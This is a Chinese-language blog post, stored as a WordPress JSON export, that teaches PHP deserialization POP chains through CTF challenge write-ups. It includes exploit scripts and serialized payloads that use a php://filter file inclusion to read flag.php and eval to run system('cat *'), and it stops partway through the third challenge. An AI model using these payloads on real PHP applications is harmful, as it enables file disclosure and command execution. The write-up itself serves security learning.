{"id":40,"date":"2022-04-02T23:50:00","date_gmt":"2022-04-02T15:50:00","guid":{"rendered":"https:\/\/fushuling.com\/?p=40"},"modified":"2023-10-19T11:05:30","modified_gmt":"2023-10-19T03:05:30","slug":"pop%ef%bc%81%e5%af%b9php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e7%9a%84%e8%bf%90%e7%94%a8","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2022\/04\/02\/pop%ef%bc%81%e5%af%b9php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e7%9a%84%e8%bf%90%e7%94%a8\/","title":{"rendered":"pop\uff01\u5bf9php\u53cd\u5e8f\u5217\u5316\u7684\u8fd0\u7528"},"content":{"rendered":"\n

\u80cc\u666f\uff1a<\/strong><\/p>\n\n\n\n

\u4e0a\u5468\u6253\u6bd4\u8d5b\u7684\u65f6\u5019\u9047\u5230\u4e86\u4e00\u9053\u53eb\uff1aezpop\u7684\u9898\uff0c\u8fdb\u53bb\u4e00\u770b\u662fphp\uff0c\u6211\u4ee5\u4e3a\u8fd9\u5c31\u662f\u4e00\u9053\u7b80\u5355\u7684\u4e0e\u53cd\u5e8f\u5217\u5316\u6709\u5173\u7684php\u9898\uff0c\u4f46\u6ca1\u60f3\u5230\u8fd9\u6d89\u53ca\u5230\u4e00\u79cd\u672c\u4eba\u4e4b\u524d\u6ca1\u542c\u5230\u8fc7\u7684\u6982\u5ff5\u2014\u2014pop\u94fe\uff0c\u56e0\u6b64\u4ee5\u672c\u6587\u5bf9\u76f8\u5173\u77e5\u8bc6\u70b9\u505a\u4e00\u4e2a\u7b80\u5355\u7684\u8bb0\u5f55\u3002<\/p>\n\n\n\n

\u4ec0\u4e48\u662fpop<\/h2>\n\n\n\n

pop\u5982\u6587\u7ae0\u6807\u9898\u6240\u8a00\uff0c\u672c\u8d28\u4e0a\u662f\u4e00\u79cd\u5bf9\u4e8ephp\u53cd\u5e8f\u5217\u5316\u7684\u8fd0\u7528\u3002<\/p>\n\n\n\n

\u90a3\u4ec0\u4e48\u53c8\u662f\u53cd\u5e8f\u5217\u5316\u5462\uff1f<\/p>\n\n\n\n

\n

\u5e8f\u5217\u5316\u662f\u4e3a\u4e86\u65b9\u4fbf\u4e8e\u6570\u636e\u7684\u4f20\u8f93\uff0c\u5f62\u8c61\u5316\u7406\u89e3\u5c31\u50cf\u7269\u6d41\u7684\u8fc7\u7a0b\u3002\u4f60\u60f3\u628a\u4e00\u5f20\u684c\u5b50\u901a\u8fc7\u4ecea\u2013>b\uff0c\u4e00\u5f20\u684c\u5b50\u80af\u5b9a\u4e0d\u597d\u8fd0\u8f93\uff0c\u56e0\u6b64\u9700\u8981\u628a\u5b83\u62c6\u5f00\uff08\u8fd9\u4e2a\u62c6\u7684\u8fc7\u7a0b\u5c31\u662f\u5e8f\u5217\u5316\uff09\uff1b\u7b49\u5230\u8fbe\u4e86b\u9700\u8981\u628a\u4ed6\u7ec4\u88c5\u8d77\u6765\uff08\u88c5\u7684\u8fc7\u7a0b\u5c31\u662f\u53cd\u5e8f\u5217\u5316\uff09\u3002<\/p>\n<\/blockquote>\n\n\n\n

\u501f\u7528\u4e4b\u524d\u6211\u4eec\u5b89\u5168\u90e8\u95e8web\u65b9\u5411\u7684\u8003\u6838\u9898\u4e3e\u4e2a\u5217\u5b50\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7ecf\u5e8f\u5217\u5316\u4e4b\u540e\uff0c\u8fd9\u4e2a\u7c7b\u8f6c\u5316\u6210\u4e86\u4e00\u884c\u8574\u542b\u5404\u4e2a\u53d8\u91cf\u6570\u503c\uff0c\u7c7b\u578b\u7684\u5b57\u7b26\u4e32\uff0c\u663e\u7136\uff0c\u4e0e\u4f20\u8f93\u8fd9\u884c\u5b57\u7b26\u4e32\u76f8\u6bd4\uff0c\u5c06\u5de6\u8fb9\u90a3\u4e2a\u7c7b\u4f20\u8f93\u8981\u9ebb\u70e6\u7684\u591a\u3002\u56e0\u6b64\u6211\u4eec\u8981\u5c06\u6570\u636e\u62c6\u5f00\u8fdb\u884c\u8fd0\u8f93\uff0c\u5230\u8fbe\u76ee\u7684\u5730\u4e4b\u540e\uff0c\u518d\u5c06\u62c6\u5f00\u7684\u96f6\u4ef6\u7ec4\u88c5\u8fdb\u6765\uff0c\u8fd9\u4fbf\u662f\u5e8f\u5217\u5316\uff0c\u800c\u53cd\u5e8f\u5217\u5316\uff0c\u81ea\u7136\u5c31\u662f\u5e8f\u5217\u5316\u7684\u9006\u8fd0\u7b97\u4e86\u3002<\/p>\n\n\n\n

\u4e00\u822c\u800c\u8a00\uff0c\u5e8f\u5217\u5316\u653b\u51fb\u591a\u662f\u5728\u9b54\u672f\u65b9\u6cd5\u4e2d\u51fa\u73b0\u4e00\u4e9b\u5229\u7528\u7684\u6f0f\u6d1e\uff0c\u6bd4\u5982\u7ecf\u5178\u7684wakeup\u9b54\u672f\u65b9\u6cd5\uff0c\u6211\u4eec\u53ef\u4ee5\u4fee\u6539\u6570\u636e\u7684\u6570\u503c\u4ee5\u81ea\u52a8\u8c03\u7528\u4ece\u800c\u89e6\u53d1\u6f0f\u6d1e\u3002\u4f46\u662f\u5f53\u5173\u952e\u4ee3\u7801\u6216\u8005\u6f0f\u6d1e\u4e0d\u5728\u9b54\u672f\u65b9\u6cd5\u4e2d\uff0c\u800c\u662f\u5728\u4e00\u4e2a\u7c7b\u7684\u666e\u901a\u65b9\u6cd5\u4e2d\uff0c\u8fd9\u65f6\u5019\u53ef\u4ee5\u901a\u8fc7\u5bfb\u627e\u76f8\u540c\u7684\u51fd\u6570\u540d\u5c06\u7c7b\u7684\u5c5e\u6027\u548c\u654f\u611f\u51fd\u6570\u7684\u5c5e\u6027\u8054\u7cfb\u8d77\u6765\u3002\u4e3e\u4e2a\u4f8b\u5b50\uff0cpop\u94fe\u7684\u7ecf\u5178\u5165\u95e8\u9898\uff1a[MRCTF2020]Ezpop<\/p>\n\n\n\n

Welcome to index.php\n<?php\n\/\/flag is in flag.php\nclass Modifier {\n    protected  $var;\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\nclass Show{\n    public $source;\n    public $str;\n    public function __construct($file='index.php'){\n        $this->source = $file;\n        echo 'Welcome to '.$this->source.\"<br>\";\n    }\n    public function __toString(){\n        return $this->str->source;\n    }\n\n    public function __wakeup(){\n        if(preg_match(\"\/gopher|http|file|ftp|https|dict|\\.\\.\/i\", $this->source)) {\n            echo \"hacker\";\n            $this->source = \"index.php\";\n        }\n    }\n}\n\nclass Test{\n    public $p;\n    public function __construct(){\n        $this->p = array();\n    }\n\n    public function __get($key){\n        $function = $this->p;\n        return $function();\n    }\n}\n\nif(isset($_GET['pop'])){\n    @unserialize($_GET['pop']);\n}\nelse{\n    $a=new Show;\n    highlight_file(__FILE__);\n}\n<\/code><\/pre>\n\n\n\n
\u4e00\u70b9\u4e00\u70b9\u5206\u6790\uff0c\u9996\u5148\u8fd9\u9053\u9898\u4ece\u9b54\u672f\u65b9\u6cd5\u5165\u624b\u4e0d\u662f\u5f88\u73b0\u5b9e\uff0c\u53ea\u80fd\u4e00\u4e2a\u7c7b\u4e00\u4e2a\u7c7b\u7684\u5206\u6790\u4e86:<\/p>\n\n\n\n
class Modifier {\n    protected  $var;\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u6709\u4e2ainclude\uff0c\u8fd9\u5f88\u660e\u663e\u662f\u4e2a\u5371\u9669\u51fd\u6570\uff0c\u5728\u5f88\u591actf\u9898\u76ee\u4e2d\uff0c\u6211\u4eec\u90fd\u53ef\u4ee5\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u5e72\u70b9\u574f\u4e8b\uff0c\u4e0b\u9762\u6709\u4e2ainvoke\u9b54\u672f\u65b9\u6cd5\uff0c\u5f53\u5c1d\u8bd5\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u8be5\u65b9\u6cd5\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528\u3002<\/p>\n\n\n\n
\u4ece\u7b2c\u4e00\u4e2a\u7c7b\u53ef\u4ee5\u770b\u51fa\uff0c\u6211\u4eec\u8981\u6ee1\u8db3:<\/p>\n\n\n\n
$var=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php\n#base64\u52a0\u5bc6\u4e00\u4e0b\uff0c\u56e0\u4e3a\u672c\u9898\u6709\u8fc7\u6ee4\uff0c\u8fc7\u6ee4\u4e4b\u540e\u518d\u7528\u4f2a\u534f\u8bae\u83b7\u5f97flag<\/code><\/pre>\n\n\n\n
\u7136\u540e\u518d\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u5bf9\u8c61\u65f6\u81ea\u52a8\u89e6\u53d1_invoke\u65b9\u6cd5\uff0c\u8c03append\u3002\u8fd9\u6837\u5c06var\u5b9a\u4e49\u4e3a\u4f2a\u534f\u8bae\u4e4b\u540e\uff0c\u5c31\u4f1a\u4ee5\u53d8\u91cf\u4e3a$this->var\u7684\u60c5\u51b5\u4e0b\u8c03\u7528append\uff0c\u89e6\u53d1\u6587\u4ef6\u5305\u542b\u3002\u4f46\u95ee\u9898\u662f\uff0c\u6211\u4eec\u8be5\u5982\u4f55\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u5bf9\u8c61\u5462\uff0c\u770b\u5230\u7b2c\u4e09\u4e2a\u7c7b\uff1a<\/p>\n\n\n\n
class Test{\n    public $p;\n    public function __construct(){\n        $this->p = array();\n    }\n\n    public function __get($key){\n        $function = $this->p;\n        return $function();\n    }\n}<\/code><\/pre>\n\n\n\n
__get\uff08\uff09\u662f\u4e00\u79cd\u9b54\u672f\u65b9\u6cd5\uff0c\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e2d\u8bfb\u53d6\u6570\u636e\u4f1a\u89e6\u53d1\u3002\u5728_get\uff08$key\uff09\u51fd\u6570\u4e2d\uff0c$function=$this->p\uff0c\u4e5f\u5c31\u662f\u6210\u5458\u53d8\u91cfp\uff0c\u6b64\u65f6\u4f1a\u628a$function\u8c03\u7528\u4e3a$function()\u51fd\u6570\uff0c\u800c$p\u662f\u6211\u4eec\u53ef\u63a7\u7684\uff0c\u8fd9\u6837\u5c31\u80fd\u6ee1\u8db3\u8c03\u7528_invoke\u7684\u6761\u4ef6\u4e86\u3002\u56e0\u6b64\u4e3a\u4e86\u8ba9\u5c5e\u6027$p\u53ef\u4ee5\u89e6\u53d1_invoke()\u9b54\u672f\u65b9\u6cd5\uff0c\u6211\u4eec\u5fc5\u987b\u5c06$p\u8d4b\u503c\u4e3aModifier\u7c7b\u7684\u5bf9\u8c61\u3002\u90a3\u4e48\u73b0\u5728\u7684\u95ee\u9898\u53c8\u6210\u4e3a\u4e86\u5982\u4f55\u89e6\u53d1_get()\u9b54\u672f\u65b9\u6cd5\u4e86\uff0c\u7528\u4ec0\u4e48\u65b9\u5f0f\u518d\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e2d\u8bfb\u53d6\u6570\u636e\u5462\uff0c\u770b\u5230show\u8fd9\u4e2a\u7c7b\uff1a<\/p>\n\n\n\n
class Show{\n    public $source;\n    public $str;\n    public function __construct($file='index.php'){\n        $this->source = $file;\n        echo 'Welcome to '.$this->source.\"<br>\";\n    }\n    public function __toString(){\n        return $this->str->source;\n    }\n\n    public function __wakeup(){\n        if(preg_match(\"\/gopher|http|file|ftp|https|dict|\\.\\.\/i\", $this->source)) {\n            echo \"hacker\";\n            $this->source = \"index.php\";\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
\u770b\u5230__toString()\uff0c\u8fd9\u540c\u6837\u662f\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u5f53\u7c7b\u7684\u5bf9\u8c61\u88ab\u5f53\u4f5c\u5b57\u7b26\u4e32\u64cd\u4f5c\u65f6\u8c03\u7528\uff0c\u5982\u679c\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5\u88ab\u8c03\u7528\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u5b83\u4f1areturn $this->str->source\uff0c\u4e5f\u5c31\u662f\u8bfb\u53d6\u6709str\u5c5e\u6027\u7684source\uff0c\u4f46\u5982\u679c\u6211\u4eec\u5c06str\u8d4b\u503c\u4e3aTest\u7c7b\u7684\u5bf9\u8c61\uff0c\u8fd9\u6837\u5b83\u5c31\u6ca1\u6709source\u5c5e\u6027\u4e86\uff0c\u4f1a\u8c03\u7528_get()\u9b54\u672f\u65b9\u6cd5\u3002\u73b0\u5728\u95ee\u9898\u518d\u5ea6\u8f6c\u79fb\uff0c\u5982\u4f55\u8c03\u7528_toString()\u9b54\u672f\u65b9\u6cd5\u5462\uff1f\u770b\u5230wakeup()\u8fd9\u91cc\uff0cwakeup()\u662f\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528\u7684\uff0c\u5f88\u597d\u6ee1\u8db3\u3002\u5982\u679c\u8fd9\u4e2a\u51fd\u6570\u8c03\u7528\uff0c\u5728if\u90a3\u4e00\u884c\u91cc\u5b83\u4f1a\u6b63\u5219\u5339\u914dsource\u91cc\u6709\u6ca1\u6709\u88ab\u8fc7\u6ee4\u7684\u5b57\u7b26\uff0c\u8fd9\u65f6\u7684source\u662f\u4f5c\u4e3a\u5b57\u7b26\u4e32\u88ab\u64cd\u4f5c\u7684\uff0c\u663e\u7136\u53ef\u4ee5\u8c03\u7528_toString()\u51fd\u6570\uff0c\u56e0\u6b64\u6211\u4eec\u8981\u5c06source\u7684\u5c5e\u6027\u8d4b\u503c\u4e3aShow\u3002<\/p>\n\n\n\n
\u73b0\u5728\u601d\u8def\u5c31\u5f88\u660e\u663e\u4e86\uff0cpop\u94fe\u4e3a\uff1a<\/p>\n\n\n\n
unserialize()-->__wakeup()-->toString()-->__get()-->__invoke()-->append()-->include()<\/code><\/pre>\n\n\n\n
\u90a3\u4e48exp\u5c31\u662f\uff1a<\/p>\n\n\n\n
<?php\nclass Modifier\n{\n    protected  $var=\"php:\/\/filter\/read=convert.base64-encode\/resource=flag.php\";\n}\nclass Show\n{\n        public $source;\n        public $str;\n\n        public function __construct($file)\n       {\n            $this->source = $file;\n        }\n        public function __toString()\n        {\n            return \"\";\n        }\n}\nclass Test\n{\n        public $p;\n}\n\n    $a = new Show('123');\n    $a->str = new Test();\n    $a->str->p = new Modifier();\n\n    $b = new Show($a);\n    echo urlencode(serialize($b));    \n?><\/code><\/pre>\n\n\n\n
?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A3%3A%22123%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D<\/code><\/pre>\n\n\n\n
\u8f93\u5165\u5c06\u56de\u663ebase64\u89e3\u7801\u5373\u5f97flag\u3002<\/p>\n\n\n\n
\u56e0\u6b64pop\u94fe\u662f\u4ec0\u4e48\u5c31\u5f88\u660e\u663e\u4e86\uff1a\u4e00\u4e32\u901a\u8fc7\u50cf\u94fe\u4e00\u6837\u591a\u6b21\u8c03\u7528\u7c7b\u4e2d\u7684\u51fd\u6570\u7684\u4ee3\u7801\u3002<\/p>\n\n\n\n
\u603b\u7ed3\uff1a<\/p>\n\n\n\n
__invoke()\u9b54\u672f\u65b9\u6cd5\uff1a\u5728\u7c7b\u7684\u5bf9\u8c61\u88ab\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u5019\uff0c\u81ea\u52a8\u88ab\u8c03\u7528\n__toString()\u9b54\u672f\u65b9\u6cd5\uff1a\u5728\u7c7b\u7684\u5bf9\u8c61\u88ab\u5f53\u4f5c\u5b57\u7b26\u4e32\u64cd\u4f5c\u7684\u65f6\u5019\uff0c\u81ea\u52a8\u88ab\u8c03\u7528\n__wakeup()\u9b54\u672f\u65b9\u6cd5\uff0c\u5728\u7c7b\u7684\u5bf9\u8c61\u53cd\u5e8f\u5217\u5316\u7684\u65f6\u5019\uff0c\u81ea\u52a8\u88ab\u8c03\u7528\n__construct()\u6784\u9020\u65b9\u6cd5\uff1a\u5728\u7c7b\u7684\u5bf9\u8c61\u5b9e\u4f8b\u5316\u4e4b\u524d\uff0c\u81ea\u52a8\u88ab\u8c03\u7528\n__get()\u9b54\u672f\u65b9\u6cd5\uff1a\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e2d\u8bfb\u53d6\u6570\u636e\u4f1a\u89e6\u53d1<\/code><\/pre>\n\n\n\n
\u8d5b\u9898\u590d\u73b0<\/h2>\n\n\n\n
2022DASCTF-ezpop<\/p>\n\n\n\n
<?php\n\nclass crow\n{\n    public $v1;\n    public $v2;\n\n    function eval() {\n        echo new $this->v1($this->v2);\n    }\n\n    public function __invoke()\n    {\n        $this->v1->world();\n    }\n}\n\nclass fin\n{\n    public $f1;\n\n    public function __destruct()\n    {\n        echo $this->f1 . '114514';\n    }\n\n    public function run()\n    {\n        ($this->f1)();\n    }\n\n    public function __call($a, $b)\n    {\n        echo $this->f1->get_flag();\n    }\n\n}\n\nclass what\n{\n    public $a;\n\n    public function __toString()\n    {\n        $this->a->run();\n        return 'hello';\n    }\n}\nclass mix\n{\n    public $m1;\n\n    public function run()\n    {\n        ($this->m1)();\n    }\n\n    public function get_flag()\n    {\n        eval('#' . $this->m1);\n    }\n\n}\n\nif (isset($_POST['cmd'])) {\n    unserialize($_POST['cmd']);\n} else {\n    highlight_file(__FILE__);\n}\n<\/code><\/pre>\n\n\n\n
__call()\uff0c\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\n__toString()\uff0c\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u4f7f\u7528\n__invoke()\uff0c\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\u7684\u56de\u5e94\u65b9\u6cd5<\/code><\/pre>\n\n\n\n
\u50cf\u4e4b\u524d\u4e00\u6837\uff0c\u6784\u9020pop\u94fe\u3002<\/p>\n\n\n\n
\u76ee\u6807\u662fget_flag()\uff0c__call\uff08\uff09\u53ef\u4ee5\u8c03\u7528get_flag()\u3002\u800c_call()\u662f\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\u7684\uff0c\u5f88\u663e\u7136\u53ef\u4ee5\u7531_invoke()\u8c03\u7528\uff0c\u56e0\u4e3a_invoke\u91cc\u6709\u4e2a\u83ab\u540d\u5176\u5999\u7684world()\u51fd\u6570\uff0c\u6574\u7247\u4ee3\u7801\u4e2d\u5c31\u51fa\u73b0\u8fc7\u4e00\u6b21\uff0c\u5c31\u8fd9\u91cc\uff1b\u597d\uff0c\u73b0\u5728\u7684\u94fe\u662f\uff1a__invoke()–>__call()–>get_flag()\uff0c\u6211\u4eec\u7ee7\u7eed\u3002<\/p>\n\n\n\n
\u8c03\u7528__invoke()\u7684\u6761\u4ef6\u662f\u51fa\u73b0\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u7684\u60c5\u51b5\uff0c\u8fd9\u79cd\u60c5\u51b5\u53ef\u4ee5\u7531run()\u51fd\u6570\u5b9e\u73b0\uff0crun()\u51fd\u6570\u7684\u5185\u5bb9\u662f($this–>f1)()\uff0c\u5947\u5947\u602a\u602a\u7684\uff0c\u770b\u8d77\u6765\u5c31\u50cf\u4e00\u4e2a\u51fd\u6570\u3002 __toString()\u53ef\u4ee5\u8c03\u7528run()\u51fd\u6570\uff0c\u5f53\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32__toString()\u88ab\u8c03\u7528\uff0c\u8fd9\u53ef\u4ee5\u7531__destruct()\u5b9e\u73b0\uff0c\u6bd5\u7adf__destruct\u91ccecho\u4e86f1\u548c114514\u3002\u56e0\u6b64\u5b8c\u6574\u7684pop\u94fe\u51fa\u73b0\u4e86\uff1a<\/p>\n\n\n\n
fin::__destruct\n\u2193\u2193\u2193\nwhat::__toString\n\u2193\u2193\u2193\nmix::run\n\u2193\u2193\u2193\ncrow::__invoke\n\u2193\u2193\u2193\nfin::__call\n\u2193\u2193\u2193\nmix::get_flag<\/code><\/pre>\n\n\n\n
\u73b0\u5728\u8ba9\u6211\u4eec\u6765\u5199POC\uff1a<\/p>\n\n\n\n
<?php\nclass crow\n{\n    public $v1;\n    public $v2;\n\n    public function __construct($v1)\n    {\n        $this->v1 = $v1;\n    }\n}\n\nclass fin\n{\n    public $f1;\n\n    public function __construct($f1)\n    {\n        $this->f1 = $f1;\n    }\n}\n\nclass what\n{\n    public $a;\n\n    public function __construct($a)\n    {\n        $this->a = $a;\n    }\n}\nclass mix\n{\n    public $m1;\n\n    public function __construct($m1)\n    {\n        $this->m1 = $m1;\n    }\n\n}\n\n$f = new mix(\"\\nsystem('cat *');\");  \/\/\u53cd\u5e8f\u5217\u5316\u4e4b\u540e\u624b\u52a8\u5c06\u5b57\u7b26\u6570+1\n$e = new fin($f);\n$d = new crow($e);\n$c = new mix($d);\n$b = new what($c);\n$a = new fin($b);\necho urlencode(serialize($a));<\/code><\/pre>\n\n\n\n
cmd=O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D<\/code><\/pre>\n\n\n\n
\u8f93\u5165\u5373\u5f97flag\u3002<\/p>\n\n\n\n
\u7c7b\u4f3c\u9898\uff1a[EIS 2019]EzPOP<\/h2>\n\n\n\n
<?php\nerror_reporting(0);\n\nclass A {\n\n\tprotected $store;\n\n\tprotected $key;\n\n\tprotected $expire;\n\n\tpublic function __construct($store, $key = 'flysystem', $expire = null) {\n\t\t$this->key = $key;\n\t\t$this->store = $store;\n\t\t$this->expire = $expire;\n\t}\n\n\tpublic function cleanContents(array $contents) {\n\t\t$cachedProperties = array_flip([\n\t\t\t'path', 'dirname', 'basename', 'extension', 'filename',\n\t\t\t'size', 'mimetype', 'visibility', 'timestamp', 'type',\n\t\t]);\n\n\t\tforeach ($contents as $path => $object) {\n\t\t\tif (is_array($object)) {\n\t\t\t\t$contents[$path] = array_intersect_key($object, $cachedProperties);\n\t\t\t}\n\t\t}\n\n\t\treturn $contents;\n\t}\n\n\tpublic function getForStorage() {\n\t\t$cleaned = $this->cleanContents($this->cache);\n\n\t\treturn json_encode([$cleaned, $this->complete]);\n\t}\n\n\tpublic function save() {\n\t\t$contents = $this->getForStorage();\n\n\t\t$this->store->set($this->key, $contents, $this->expire);\n\t}\n\n\tpublic function __destruct() {\n\t\tif (!$this->autosave) {\n\t\t\t$this->save();\n\t\t}\n\t}\n}\n\nclass B {\n\n\tprotected function getExpireTime($expire): int {\n\t\treturn (int) $expire;\n\t}\n\n\tpublic function getCacheKey(string $name): string {\n\t\treturn $this->options['prefix'] . $name;\n\t}\n\n\tprotected function serialize($data): string {\n\t\tif (is_numeric($data)) {\n\t\t\treturn (string) $data;\n\t\t}\n\n\t\t$serialize = $this->options['serialize'];\n\n\t\treturn $serialize($data);\n\t}\n\n\tpublic function set($name, $value, $expire = null): bool{\n\t\t$this->writeTimes++;\n\n\t\tif (is_null($expire)) {\n\t\t\t$expire = $this->options['expire'];\n\t\t}\n\n\t\t$expire = $this->getExpireTime($expire);\n\t\t$filename = $this->getCacheKey($name);\n\n\t\t$dir = dirname($filename);\n\n\t\tif (!is_dir($dir)) {\n\t\t\ttry {\n\t\t\t\tmkdir($dir, 0755, true);\n\t\t\t} catch (\\Exception $e) {\n\t\t\t\t\/\/ \u521b\u5efa\u5931\u8d25\n\t\t\t}\n\t\t}\n\n\t\t$data = $this->serialize($value);\n\n\t\tif ($this->options['data_compress'] && function_exists('gzcompress')) {\n\t\t\t\/\/\u6570\u636e\u538b\u7f29\n\t\t\t$data = gzcompress($data, 3);\n\t\t}\n\n\t\t$data = \"<?php\\n\/\/\" . sprintf('%012d', $expire) . \"\\n exit();?>\\n\" . $data;\n\t\t$result = file_put_contents($filename, $data);\n\n\t\tif ($result) {\n\t\t\treturn true;\n\t\t}\n\n\t\treturn false;\n\t}\n\n}\n\nif (isset($_GET['src']))\n{\nhighlight_file(__FILE__);\n}\n\n$dir = \"uploads\/\";\n\nif (!is_dir($dir))\n{\nmkdir($dir);\n}\nunserialize($_GET[\"data\"]);\n<\/code><\/pre>\n\n\n\n
\u4e00\u6b65\u4e00\u6b65\u5f00\u59cb\u5206\u6790\uff1a<\/p>\n\n\n\n
\u8d4b\u503c\uff0c\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684\u3002<\/p>\n\n\n\n
public function __construct($store, $key = 'flysystem', $expire = null) {\n\t\t$this->key = $key;\n\t\t$this->store = $store;\n\t\t$this->expire = $expire;\n\t}\n<\/code><\/pre>\n\n\n\n
array_flip\uff1a\u8fd4\u56de\u4e00\u4e2a\u53cd\u8f6c\u540e\u7684\u6570\u7ec4\uff1b<\/p>\n\n\n\n
array_intersect_key\uff1a\u6bd4\u8f83\u4e24\u4e2a\u6570\u7ec4\u7684\u952e\u540d,\u5e76\u8fd4\u56de\u4ea4\u96c6\uff1b<\/p>\n\n\n\n
\u6240\u4ee5\u8fd9\u4e2acleanContent\u5927\u6982\u5c31\u662f\u8fd4\u56depath\u548cobject\u7684\u4ea4\u96c6<\/p>\n\n\n\n
public function cleanContents(array $contents) {\n\t\t$cachedProperties = array_flip([\n\t\t\t'path', 'dirname', 'basename', 'extension', 'filename',\n\t\t\t'size', 'mimetype', 'visibility', 'timestamp', 'type',\n\t\t]);\n\n\t\tforeach ($contents as $path => $object) {\/\/\u5728contents\u6570\u7ec4\u4e2d\uff0c\u952e\u7ed9path,\u503c\u7ed9object\n\t\t\tif (is_array($object)) {\n\t\t\t\t$contents[$path] = array_intersect_key($object, $cachedProperties);\n\t\t\t}\n\t\t}\n\n\t\treturn $contents;\n\t}<\/code><\/pre>\n\n\n\n
\u5c06cache\u4f5c\u4e3a\u53c2\u6570\u8c03\u7528cleanContents(),\u518d\u5c06\u7ed3\u679c\u548ccomplete\u4e00\u8d77\u8fd4\u56de\u4ed6\u4eec\u7684json\u6570\u636e\u3002\u800c\u4e14cache\u548ccomplete\u90fd\u662f\u53ef\u63a7\u7684\u3002<\/p>\n\n\n\n
public function getForStorage() {\n\t\t$cleaned = $this->cleanContents($this->cache);\n\n\t\treturn json_encode([$cleaned, $this->complete]);\n\t}<\/code><\/pre>\n\n\n\n
\u8c03\u7528getForStorage()\u5e76\u5c06\u7ed3\u679c\u653e\u5165$contents\uff0c\u7136\u540e\u518d\u7528set\u65b9\u6cd5\u5904\u7406key,contents,expire\u3002\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0cset\u51fd\u6570\u662f\u5728B\u7c7b\u91cc\u9762\u7684\uff0c\u6240\u4ee5$this->store\u5e94\u8be5\u8981\u5b9a\u4e49\u6210B\u7c7b\uff0c\u4f5c\u4e3a\u6865\u6881\u4e32\u8054A\u7c7b\u548cB\u7c7b\uff0c\u5e76\u4e14key\u548cexpire\u53ef\u63a7\u3002<\/p>\n\n\n\n
public function save() {
\t\t$contents = $this->getForStorage();

\t\t$this->store->set($this->key, $contents, $this->expire);
\t}<\/code><\/pre>\n\n\n\n
destruct\uff08\uff09\uff0c\u7c7b\u6467\u6bc1\u65f6\u8c03\u7528\u3002\u91cc\u9762\u7684\u5185\u5bb9\u5f88\u7b80\u5355\uff0c\u5f53$this->autosave\u4e0d\u6210\u7acb\uff0c\u8c03\u7528\u4e0a\u9762\u7684save\u65b9\u6cd5\u3002autosave\uff0c\u987e\u540d\u601d\u4e49\uff0c\u81ea\u52a8\u4fdd\u5b58\uff0c\u628a\u5b83\u8bbe\u7f6e\u6210autosave=false\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n
public function __destruct() {\n\t\tif (!$this->autosave) {\n\t\t\t$this->save();\n\t\t}\n}<\/code><\/pre>\n\n\n\n
\u770b\u770bB\uff1a<\/p>\n\n\n\n
